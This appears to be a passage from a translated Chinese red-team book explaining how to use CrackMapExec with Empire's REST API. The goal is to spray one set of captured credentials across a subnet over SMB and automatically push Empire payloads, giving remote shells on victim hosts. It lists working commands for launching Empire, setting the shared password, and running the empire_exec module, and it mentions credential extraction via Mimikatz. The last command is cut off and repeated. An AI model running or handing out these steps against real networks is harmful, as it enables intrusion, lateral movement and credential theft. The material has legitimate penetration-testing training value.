使用 CrackMapExec(CME)扫描网络
如果我们还没有成功入侵进一个系统,但是我们确实通过 Responder、错误配置的 Web 应用程序、暴力破解或通过打印机获得了登录凭证,那么我们可以尝试扫描网络,看看这个帐户可以登录到哪里。使用像 CrackMapExec(CME)这样的工具进行简单的扫描可以帮助找到内部网络上的初始入口点。
过去,我们使用 CME 扫描网络、通过网络上的 SMB 进行标识/身份验证、对许多主机远程执行命令,甚至通过 Mimikatz 提取明文凭证。Empire 和 CME 都拥有了一些新特性,我们可以利用 Empire 的 REST 特性。在下面的场景中,我们将使用其 REST API 启动 Empire,在 CME 中配置密码,让 CME 连接到 Empire,使用我们拥有的单一凭证扫描网络,最后,如果成功完成身份验证,则自动将 Empire 的 payload 推送到远程受害者的系统。如果你有一个 helpdesk 或高权限帐户,那就准备好加载 Empire shell 吧!
- 启动 Empire 的 REST API 服务器
- cd /opt/Empire
- ./empire —rest —password ‘hacktheuniverse’
- 更改 CrackMapExec 密码
- 打开 /root/.cme/cme.conf
- password=hacktheuniverse
- 运行 CME 来生成 Empire shells
- cme smb 10.100.100.0/24 -d ‘cyberspacekittens.local’ -u ‘
’ -p ‘ ’ -M empire_exec -o LISTENER=http
- cme smb 10.100.100.0/24 -d ‘cyberspacekittens.local’ -u ‘
当前内容版权归 Snowming(雪茗)译 或其关联方所有,如需对内容或内容相关联开源项目进行关注与资助,请访问 Snowming(雪茗)译 .